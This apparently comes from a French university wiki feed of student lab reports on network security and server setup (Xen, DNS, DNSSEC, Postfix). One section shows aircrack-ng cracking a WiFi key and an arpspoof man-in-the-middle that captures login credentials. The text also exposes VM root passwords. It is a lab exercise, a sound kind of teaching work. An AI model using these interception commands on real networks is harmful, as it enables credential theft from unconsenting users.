Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53938</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53938"/>
				<updated>2020-11-20T08:55:01Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Envoie du SSL Certification Gandi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
